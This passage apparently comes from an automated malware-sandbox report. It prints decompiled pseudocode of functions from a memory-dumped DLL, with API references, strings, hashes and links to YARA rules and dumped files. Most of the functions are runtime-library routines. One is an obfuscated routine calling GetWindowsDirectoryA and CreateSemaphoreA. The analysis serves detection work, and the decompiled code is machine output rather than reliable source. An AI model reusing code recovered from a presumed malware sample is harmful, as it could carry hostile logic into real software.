				_t253 =  *0x6e21898c; // 0x0
				 *(_t270 - 0x30) = _t114;
				 *0x6e2189a0 = _t114;
				_t35 = _t114 + 3; // 0x3
				_t233 = 0;
				 *(_t270 - 0x29) = _t35 +  *0x6e218988;
				_t198 =  *0x6e218995 & 0x000000ff;
				 *0x6e222b18 = 0;
				 *(_t270 - 0x44) = _t198;
				do {
					if(_t114 == _t198) {
						goto L31;
					} else {
						_t38 = _t233 + 0x6e218990; // 0x866d3c9e
						asm("cdq");
						_t262 = _t114 -  *0x6e2189f0 - 0xb + ( *_t38 & 0x000000ff);
						_t154 =  *0x6e21899a & 0x000000ff;
						asm("adc ecx, edx");
						 *0x6e218988 =  *0x6e218988 - _t114 -  *0x6e2189f0 - 0xb + ( *_t38 & 0x000000ff);
						asm("sbb edi, ecx");
						 *0x6e21898c = _t253;
						_t288 =  *0x6e2189f0 - _t154; // 0xc8c83700
						if(_t288 != 0) {
							_t114 =  *(_t270 - 0x30);
							_t233 =  *0x6e222b18; // 0x1
							_t198 =  *(_t270 - 0x44);
							goto L31;
						}
					}
					break;
					L31:
					_t233 = _t233 + 1;
					 *0x6e222b18 = _t233;
				} while (_t233 < 0x21);
				_t115 =  *(_t270 - 0x29) & 0x000000ff;
				_t199 =  *0x6e218988; // 0xfbec8649
				asm("cdq");
				_t290 = _t233 - _t253;
				_t254 =  *(_t270 - 0x38);
				if(_t290 < 0 || _t290 <= 0 && _t115 < _t199) {
					_t234 =  *0x6e21898c; // 0x0
				} else {
					_t242 =  *(_t270 - 0x34);
					 *0x6e2189ec = _t242 * _t254;
					_t234 =  *0x6e21898c; // 0x0
					_t199 = _t199 + _t242 + 0x6893;
					 *0x6e218988 = _t199;
					asm("adc edx, 0x0");
					 *0x6e21898c = _t234;
				}
				 *0x6e2189a4 =  *(_t270 - 0x40) - _t199 + 0xc;
				_t121 =  *(_t270 - 0x30) + 3 +  *0x6e2189f0;
				_push(_t234);
				 *(_t270 - 0x30) = _t121;
				_push(_t199);
				_push(_t121 & 0x000000ff);
				E6E18195D(_t182, E6E18195D(_t182, E6E17E855(_t182, E6E17E961(_t182, E6E18178B(_t182, _t254, _t262), _t234, _t254, _t262, _t121), _t234, _t254, _t262, _t121),  *(_t270 - 0x48), _t254, _t262, _t121), "Eig", _t254, _t262, _t121);
				_t237 =  *(_t270 - 0x30);
				_t204 = 0x2b;
				do {
					_t293 = _t237 -  *0x6e218990; // -98
					if(_t293 != 0) {
						 *((intOrPtr*)(_t204 + 0x6e218990)) =  *((intOrPtr*)(_t204 + 0x6e218990)) + 0xf5;
						_t237 =  ~_t237;
					}
					_t204 = _t204 - 2;
				} while (_t204 > 2);
				_t130 =  *0x6e218988; // 0xfbec8649
				_t255 =  *0x6e2189a4 & 0x000000ff;
				 *0x6e222b18 = _t204;
				 *(_t270 - 0x30) = _t237;
				_t207 = _t130 - _t255 - 0x46;
				 *(_t270 - 0x40) = _t130;
				 *(_t270 - 0x34) = _t207;
				if( *0x6e21899c == 0) {
					_t59 = _t270 - 0x44;
					 *_t59 =  *(_t270 - 0x44) & 0x00000000;
					__eflags =  *_t59;
					 *(_t270 - 0x40) = _t207 -  *0x6e2189a0 + 0xc;
				} else {
					_t269 =  *0x6e21898c; // 0x0
					 *(_t270 - 0x44) = _t269;
					_t207 = _t130 + (_t207 + 0xcda) * 2 +  *0x6e2189a0;
					 *(_t270 - 0x34) = _t207;
				}
				_t134 =  *0x6e218999 & 0x000000ff;
				 *(_t270 - 0x48) = _t134;
				if(_t134 <= _t207) {
					_t207 = _t207 + 0xf;
					 *0x6e218994 = _t237;
					 *(_t270 - 0x30) = 0xba;
					 *(_t270 - 0x34) = _t207;
				}
				asm("cdq");
				_t256 = _t237;
				asm("cdq");
				_t137 =  *0x6e2189a0; // 0xf24087a
				asm("sbb edi, edx");
				_t268 = _t255 -  *(_t270 - 0x3c) -  *(_t270 - 0x40);
				 *(_t270 - 0x38) = _t268;
				asm("sbb edi, [ebp-0x44]");
				 *0x6e218988 = _t268;
				 *0x6e21898c = _t256;
				if( *(_t270 - 0x48) > _t137) {
					_t238 =  *(_t270 - 0x34);
				} else {
					_t149 = _t137 - _t207;
					 *0x6e218994 = _t207;
					_t256 = 0;
					 *0x6e21898c = 0;
					_t69 = _t149 + 0xc; // 0xf240886
					_t240 = _t69;
					_t268 = _t240;
					 *(_t270 - 0x38) = _t268;
					_t238 = _t240 -  *0x6e2189a0 - 0x46;
					 *0x6e218988 = _t268;
				}
				if(( *0x6e21899c & 0x000000ff) - ( *0x6e218992 & 0x000000ff) == 0x27f) {
					_t238 =  *(_t270 - 0x30) & 0x000000ff;
				}
				_t210 =  *(_t270 - 0x38);
				_t239 =  *(_t270 - 0x3c);
				 *0x6e2189f0 = _t238 + 0xb;
				_t301 =  *0x6e2189d4 - _t239; // 0x14
				if(_t301 <= 0) {
					 *0x6e2189c0 = _t210;
					_t213 = _t239 - _t210 + 0xc;
					 *0x6e2189a0 = _t213;
					_t210 = _t213 - _t239 - 0x46;
					_t256 = 0;
					 *0x6e218988 = _t210;
					 *0x6e21898c = 0;
				}
				if( *0x6e2189c8 == 0x8a3) {
					_t256 = (_t256 << 0x00000020 | _t210) << 1;
					_t210 = _t210 + _t210 + 0x574d;
					 *0x6e218988 = _t210;
					asm("adc edi, 0x0");
					 *0x6e21898c = _t256;
				}
				 *0x6e2189a4 = (_t210 & 0x000000ff) * 6;
				 *(_t270 - 4) =  *(_t270 - 4) | 0xffffffff;
				E6E17FB57(_t270 - 0x28);
				return E6E1A9D9D(1, _t182, _t256, _t268);
			}

0x6e17d580
0x6e17d580
0x6e17d587
0x6e17d591
0x6e17d596
0x6e17d59c
0x6e17d5a8
0x6e17d5ad
0x6e17d5dc
0x6e17d5af
0x6e17d5af
0x6e17d5b7
0x6e17d5b9
0x6e17d5bf
0x6e17d5c5
0x6e17d5c5
0x6e17d5ca
0x6e17d5d5
0x6e17d5d5
0x6e17d5e2
0x6e17d5e7
0x6e17d5ea
0x6e17d5f0
0x6e17d5f4
0x6e17d5fa
0x6e17d5fc
0x6e17d607
0x6e17d608
0x6e17d60d
0x6e17d60d
0x6e17d62e
0x6e17d631
0x6e17d653
0x6e17d65e
0x6e17d65e
0x6e17d661
0x6e17d667
0x6e17d633
0x6e17d633
0x6e17d639
0x6e17d64c
0x6e17d64c
0x6e17d674
0x6e17d679
0x6e17d67c
0x6e17d67e
0x6e17d687
0x6e17d68a
0x6e17d692
0x6e17d698
0x6e17d69d
0x6e17d6a3
0x6e17d6a6
0x6e17d6a6
0x6e17d6ac
0x00000000
0x6e17d6ae
0x6e17d6ae
0x6e17d6be
0x6e17d6c0
0x6e17d6c6
0x00000000
0x00000000
0x6e17d6c6
0x00000000
0x6e17d6d1
0x6e17d6d1
0x6e17d6d2
0x6e17d6df
0x6e17d6e5
0x6e17d6e8
0x6e17d6ee
0x6e17d6f2
0x6e17d6f9
0x6e17d703
0x6e17d709
0x6e17d72e
0x6e17d72e
0x6e17d735
0x6e17d70b
0x6e17d70b
0x6e17d71e
0x6e17d71e
0x6e17d73d
0x6e17d749
0x6e17d784
0x6e17d792
0x6e17d798
0x6e17d798
0x6e17d79a
0x6e17d74b
0x6e17d74b
0x6e17d750
0x6e17d76d
0x6e17d76f
0x6e17d772
0x6e17d774
0x6e17d776
0x6e17d77c
0x6e17d77c
0x6e17d79d
0x6e17d7a3
0x6e17d7b0
0x6e17d7b2
0x6e17d7b5
0x6e17d7bb
0x6e17d7c0
0x6e17d7c5
0x6e17d7c8
0x6e17d7d2
0x6e17d7d5
0x6e17d7db
0x6e17d7dd
0x6e17d7e3
0x6e17d7e5
0x6e17d7ea
0x6e17d7ec
0x6e17d7f2
0x6e17d7f8
0x6e17d7f8
0x6e17d7fd
0x6e17d80c
0x6e17d80c
0x6e17d811
0x6e17d814
0x6e17d815
0x6e17d817
0x6e17d847
0x6e17d81f
0x6e17d822
0x6e17d830
0x6e17d836
0x6e17d839
0x6e17d83f
0x6e17d83f
0x6e17d855
0x6e17d858
0x6e17d85b
0x6e17d860
0x6e17d866
0x6e17d869
0x6e17d86e
0x6e17d877
0x6e17d879
0x6e17d87c
0x6e17d883
0x6e17d889
0x6e17d88c
0x6e17d88e
0x00000000
0x6e17d890
0x6e17d89a
0x6e17d8a4
0x6e17d8a5
0x6e17d8a7
0x6e17d8ae
0x6e17d8b0
0x6e17d8b6
0x6e17d8b8
0x6e17d8be
0x6e17d8c4
0x6e17d8c6
0x6e17d8c9
0x6e17d8cf
0x00000000
0x6e17d8cf
0x6e17d8c4
0x00000000
0x6e17d8d2
0x6e17d8d2
0x6e17d8d3
0x6e17d8d9
0x6e17d8de
0x6e17d8e2
0x6e17d8e8
0x6e17d8e9
0x6e17d8eb
0x6e17d8ee
0x6e17d922
0x6e17d8f6
0x6e17d8f6
0x6e17d8fe
0x6e17d909
0x6e17d90f
0x6e17d911
0x6e17d917
0x6e17d91a
0x6e17d91a
0x6e17d92f
0x6e17d939
0x6e17d93f
0x6e17d940
0x6e17d943
0x6e17d947
0x6e17d96c
0x6e17d971
0x6e17d976
0x6e17d977
0x6e17d977
0x6e17d97d
0x6e17d983
0x6e17d989
0x6e17d989
0x6e17d98b
0x6e17d98e
0x6e17d993
0x6e17d998
0x6e17d99f
0x6e17d9a9
0x6e17d9ac
0x6e17d9af
0x6e17d9b9
0x6e17d9bc
0x6e17d9e6
0x6e17d9e6
0x6e17d9e6
0x6e17d9ea
0x6e17d9be
0x6e17d9be
0x6e17d9ca
0x6e17d9d0
0x6e17d9d6
0x6e17d9d6
0x6e17d9ed
0x6e17d9f4
0x6e17d9f9
0x6e17d9fb
0x6e17d9fe
0x6e17da04
0x6e17da08
0x6e17da08
0x6e17da0d
0x6e17da10
0x6e17da15
0x6e17da18
0x6e17da1d
0x6e17da1f
0x6e17da22
0x6e17da25
0x6e17da28
0x6e17da2e
0x6e17da37
0x6e17da62
0x6e17da39
0x6e17da39
0x6e17da3b
0x6e17da41
0x6e17da43
0x6e17da49
0x6e17da49
0x6e17da4c
0x6e17da54
0x6e17da57
0x6e17da5a
0x6e17da5a
0x6e17da7b
0x6e17da80
0x6e17da80
0x6e17da83
0x6e17da89
0x6e17da8c
0x6e17da91
0x6e17da97
0x6e17da9b
0x6e17daa3
0x6e17daa6
0x6e17daae
0x6e17dab1
0x6e17dab3
0x6e17dab9
0x6e17dab9
0x6e17dac9
0x6e17dacb
0x6e17dad1
0x6e17dad7
0x6e17dadd
0x6e17dae0
0x6e17dae0
0x6e17daec
0x6e17daf1
0x6e17daf8
0x6e17db05

APIs

__EH_prolog3_GS.LIBCMT ref: 6E17D587
GetWindowsDirectoryA.KERNEL32(00000000,0000053A,00000040,6E1A9C96,?,00000001,00000000,?,00000001,00000000,?,00000001,00000000,6E216860,0000000C,00000007), ref: 6E17D621
CreateSemaphoreA.KERNEL32 ref: 6E17D6E8

Strings

Eig, xrefs: 6E17D965
direct, xrefs: 6E17D66C

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryH_prolog3_SemaphoreWindows
String ID: Eig$direct
API String ID: 262936310-466654125
Opcode ID: de263fc08db5e3b47972fc61d163f80b6a4580e314360bf635f031b68d8648ff
Instruction ID: e65e38b71b0c4dbb6d4bec81e28631afea5dba1daf5e541757930804a3a4fd48
Opcode Fuzzy Hash: de263fc08db5e3b47972fc61d163f80b6a4580e314360bf635f031b68d8648ff
Instruction Fuzzy Hash: 48F1A1B1E069598FCF4CCFA8D4DA6E8BBB3BB97304B18412AD64197740DB305681DF62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B40AC, Relevance: 9.1, APIs: 6, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1B40AC(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				void* _t39;
				char _t40;
				intOrPtr _t41;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t61;

				_t61 = _a4;
				 *_t61 = 0;
				 *((intOrPtr*)(_t61 + 4)) = 0;
				_t25 = E6E1B5444(_t39, __edx, 0, _t61,  &_v12, 1, 0);
				_t41 =  *_t25;
				 *_t61 = _t41;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t61 + 4)) = _t26;
				_t27 =  *0x6e221b68; // 0x0
				_t40 = 2;
				if(_t26 != 0) {
					L4:
					_t58 =  *_t27;
					if(_t58 != 0x40) {
						if(_t58 == 0) {
							_push(1);
							if(_t41 != 0) {
								_v12 = "::";
								_v8 = _t40;
								_t30 = E6E1AFB8D(E6E1AFB6B(E6E1AF804( &_v36),  &_v28,  &_v12),  &_v20, _t61);
								 *_t61 =  *_t30;
								 *((intOrPtr*)(_t61 + 4)) =  *((intOrPtr*)(_t30 + 4));
							} else {
								E6E1AFA80(_t61);
							}
						} else {
							 *((intOrPtr*)(_t61 + 4)) = 0;
							 *((char*)(_t61 + 4)) = _t40;
							 *_t61 = 0;
						}
						L11:
						return _t61;
					}
					L5:
					 *0x6e221b68 = _t27 + 1;
					goto L11;
				}
				_t59 =  *_t27;
				if(_t59 == 0) {
					goto L4;
				}
				if(_t59 == 0x40) {
					goto L5;
				} else {
					_v12 = "::";
					_v8 = _t40;
					_t37 = E6E1AFB8D(E6E1AFB6B(E6E1B3CFA(_t59,  &_v20),  &_v28,  &_v12),  &_v36, _t61);
					_t41 =  *_t37;
					 *_t61 = _t41;
					 *((intOrPtr*)(_t61 + 4)) =  *((intOrPtr*)(_t37 + 4));
					_t27 =  *0x6e221b68; // 0x0
					goto L4;
				}
			}

0x6e1b40b7
0x6e1b40c1
0x6e1b40c3
0x6e1b40c6
0x6e1b40ce
0x6e1b40d0
0x6e1b40d2
0x6e1b40d9
0x6e1b40dc
0x6e1b40e1
0x6e1b40e2
0x6e1b412d
0x6e1b412d
0x6e1b4132
0x6e1b413e
0x6e1b414a
0x6e1b414e
0x6e1b415c
0x6e1b4163
0x6e1b4181
0x6e1b4188
0x6e1b418d
0x6e1b4150
0x6e1b4152
0x6e1b4152
0x6e1b4140
0x6e1b4140
0x6e1b4143
0x6e1b4146
0x6e1b4146
0x6e1b4191
0x6e1b4196
0x6e1b4196
0x6e1b4134
0x6e1b4135
0x00000000
0x6e1b4135
0x6e1b40e4
0x6e1b40e8
0x00000000
0x00000000
0x6e1b40ed
0x00000000
0x6e1b40ef
0x6e1b40f2
0x6e1b40fa
0x6e1b4119
0x6e1b411e
0x6e1b4120
0x6e1b4125
0x6e1b4128
0x00000000
0x6e1b4128

APIs

Part of subcall function 6E1B5444: Replicator::operator[].LIBVCRUNTIME ref: 6E1B5481

DName::operator=.LIBVCRUNTIME ref: 6E1B4152

Part of subcall function 6E1B3CFA: DName::operator+.LIBCMT ref: 6E1B3D65
Part of subcall function 6E1B3CFA: DName::operator+.LIBCMT ref: 6E1B4023

DName::operator+.LIBCMT ref: 6E1B410D
DName::operator+.LIBCMT ref: 6E1B4119
DName::DName.LIBVCRUNTIME ref: 6E1B4166
DName::operator+.LIBCMT ref: 6E1B4175
DName::operator+.LIBCMT ref: 6E1B4181

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 789d985ffef7157be970ff3d41e8f7e6e373788bf99c22f960e05e2fb955c835
Instruction ID: cf55af07f237bd52a47ddabeb1c512094db4b7f66337860ab9910f9acd1f58dd
Opcode Fuzzy Hash: 789d985ffef7157be970ff3d41e8f7e6e373788bf99c22f960e05e2fb955c835
Instruction Fuzzy Hash: 8E3161B5A04304EFCB44CFD8D8A0AE9BBF9AF6D304F10885DE69A97340E7316589DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E18FA20, Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E18FA20(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v8;
				void* _v16;
				char _v20;
				intOrPtr* _t19;
				void* _t24;
				void* _t26;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t33 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5( &_v20, 0);
				_t47 =  *0x6e221464; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t47;
				_t19 = E6E162171(_a8, E6E161F29(__ebx, 0x6e221458, __edi, _t47));
				_t45 = _t19;
				if(_t19 != 0) {
					L5:
					E6E18F30C( &_v20);
					return E6E1A9D88(_t45);
				} else {
					if(_t47 == 0) {
						_push(_a8);
						_push( &_v16);
						_t24 = E6E1900CD(__ebx, _t45, _t47);
						_pop(_t39);
						__eflags = _t24 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							_push(_t39);
							_push(_t47);
							_t48 = _t39;
							_v8 = _t48;
							_t26 = E6E18FB55(_t33, _t39, _t45, _t48, __eflags);
							 *_t48 = 0x6e1ee948;
							E6E190165(_t26, _t48, _a4, 0);
							return _t48;
						} else {
							_t45 = _v16;
							_v16 = _t45;
							_v4 = 1;
							E6E1911C1(__eflags, _t45);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t45 + 4))))();
							 *0x6e221464 = _t45;
							goto L5;
						}
					} else {
						_t45 = _t47;
						goto L5;
					}
				}
			}

0x6e18fa20
0x6e18fa27
0x6e18fa31
0x6e18fa36
0x6e18fa41
0x6e18fa45
0x6e18fa51
0x6e18fa56
0x6e18fa5a
0x6e18fa9f
0x6e18faa2
0x6e18faae
0x6e18fa5c
0x6e18fa5e
0x6e18fa64
0x6e18fa6a
0x6e18fa6b
0x6e18fa71
0x6e18fa72
0x6e18fa75
0x6e18faaf
0x6e18fab4
0x6e18fab8
0x6e18fab9
0x6e18faba
0x6e18fabc
0x6e18fabf
0x6e18facb
0x6e18fad1
0x6e18fada
0x6e18fa77
0x6e18fa77
0x6e18fa7a
0x6e18fa7e
0x6e18fa82
0x6e18fa8f
0x6e18fa97
0x6e18fa99
0x00000000
0x6e18fa99
0x6e18fa60
0x6e18fa60
0x00000000
0x6e18fa60
0x6e18fa5e

APIs

__EH_prolog3.LIBCMT ref: 6E18FA27
std::_Lockit::_Lockit.LIBCPMT ref: 6E18FA31

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

codecvt.LIBCPMT ref: 6E18FA6B
std::_Facet_Register.LIBCPMT ref: 6E18FA82
std::_Lockit::~_Lockit.LIBCPMT ref: 6E18FAA2
Concurrency::cancel_current_task.LIBCPMT ref: 6E18FAAF

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 614290800-0
Opcode ID: ef0ce032fd3b4ebade181b484ed260145cea8a2103d5f5434433d11adfc6f174
Instruction ID: 1a7c17a4ff95586dd976a022b2b0ec220a555b2cdd9b1fd7ed3e39384983d8bd
Opcode Fuzzy Hash: ef0ce032fd3b4ebade181b484ed260145cea8a2103d5f5434433d11adfc6f174
Instruction Fuzzy Hash: E7110B35A002299BCF05DBD4CC14AEE77BDAF88724F244419F825AB280DF749EC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1914CD, Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E1914CD(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v8;
				void* _v16;
				char _v20;
				intOrPtr* _t19;
				void* _t24;
				void* _t26;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t33 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5( &_v20, 0);
				_t47 =  *0x6e221558; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t47;
				_t19 = E6E162171(_a8, E6E161F29(__ebx, 0x6e221474, __edi, _t47));
				_t45 = _t19;
				if(_t19 != 0) {
					L5:
					E6E18F30C( &_v20);
					return E6E1A9D88(_t45);
				} else {
					if(_t47 == 0) {
						_push(_a8);
						_push( &_v16);
						_t24 = E6E191922(__ebx, _t45, _t47);
						_pop(_t39);
						__eflags = _t24 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							_push(_t39);
							_push(_t47);
							_t48 = _t39;
							_v8 = _t48;
							_t26 = E6E191602(_t33, _t39, _t45, _t48, __eflags);
							 *_t48 = 0x6e1eea90;
							E6E1919A8(_t26, _t48, _a4, 0);
							return _t48;
						} else {
							_t45 = _v16;
							_v16 = _t45;
							_v4 = 1;
							E6E1911C1(__eflags, _t45);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t45 + 4))))();
							 *0x6e221558 = _t45;
							goto L5;
						}
					} else {
						_t45 = _t47;
						goto L5;
					}
				}
			}

0x6e1914cd
0x6e1914d4
0x6e1914de
0x6e1914e3
0x6e1914ee
0x6e1914f2
0x6e1914fe
0x6e191503
0x6e191507
0x6e19154c
0x6e19154f
0x6e19155b
0x6e191509
0x6e19150b
0x6e191511
0x6e191517
0x6e191518
0x6e19151e
0x6e19151f
0x6e191522
0x6e19155c
0x6e191561
0x6e191565
0x6e191566
0x6e191567
0x6e191569
0x6e19156c
0x6e191578
0x6e19157e
0x6e191587
0x6e191524
0x6e191524
0x6e191527
0x6e19152b
0x6e19152f
0x6e19153c
0x6e191544
0x6e191546
0x00000000
0x6e191546
0x6e19150d
0x6e19150d
0x00000000
0x6e19150d
0x6e19150b

APIs

__EH_prolog3.LIBCMT ref: 6E1914D4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1914DE

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

codecvt.LIBCPMT ref: 6E191518
std::_Facet_Register.LIBCPMT ref: 6E19152F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19154F
Concurrency::cancel_current_task.LIBCPMT ref: 6E19155C

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 614290800-0
Opcode ID: dd8e8d59f13f7015686ab87ad091b4ddf5f7d2e59446eb85cf6cf350f2f71d54
Instruction ID: b56ac000eec935405a4d9785693c7d1441b70ddc16c33e0f4b1c40f14b60fd13
Opcode Fuzzy Hash: dd8e8d59f13f7015686ab87ad091b4ddf5f7d2e59446eb85cf6cf350f2f71d54
Instruction Fuzzy Hash: D811E975B001159BCB05DBE8D810AFD777DAF85714F264819E816AB280CF709EC8FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE211, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E1AE211(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e218040 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E1B5D0A(_t13, __eflags,  *0x6e218040);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E1B5D45(_t14, __eflags,  *0x6e218040, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E1B6673();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E1B5D45(_t18, __eflags,  *0x6e218040, 0);
								} else {
									_t8 = E6E1B5D45(_t18, __eflags,  *0x6e218040, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E1C136B(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e1ae211
0x6e1ae218
0x6e1ae22b
0x6e1ae232
0x6e1ae234
0x6e1ae235
0x6e1ae238
0x6e1ae251
0x6e1ae251
0x6e1ae23a
0x6e1ae23a
0x6e1ae23c
0x6e1ae246
0x6e1ae24d
0x6e1ae24f
0x6e1ae256
0x6e1ae25f
0x6e1ae262
0x6e1ae263
0x6e1ae265
0x6e1ae279
0x6e1ae279
0x6e1ae282
0x6e1ae267
0x6e1ae26e
0x6e1ae274
0x6e1ae275
0x6e1ae277
0x6e1ae28b
0x6e1ae28d
0x6e1ae28d
0x00000000
0x00000000
0x00000000
0x6e1ae277
0x6e1ae290
0x00000000
0x00000000
0x00000000
0x6e1ae24f
0x6e1ae23c
0x6e1ae298
0x6e1ae2a2
0x6e1ae21a
0x6e1ae21c
0x6e1ae21c

APIs

GetLastError.KERNEL32(00000001,?,6E1ADE27,6E1A9752,6E1A9A47,?,6E1A9C7F,?,00000001,?,?,00000001,?,6E216860,0000000C,6E1A9D81), ref: 6E1AE21F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E1AE22D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E1AE246
SetLastError.KERNEL32(00000000,6E1A9C7F,?,00000001,?,?,00000001,?,6E216860,0000000C,6E1A9D81,?,00000001,?), ref: 6E1AE298

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ba9972da143e5ef666f1bddf533a64ff0641485118160ef8351f58b606f41a0d
Instruction ID: 9e53a6ed093efa1b66756578fe8ed2ae19d44a5a773408e169395049c2aa53c3
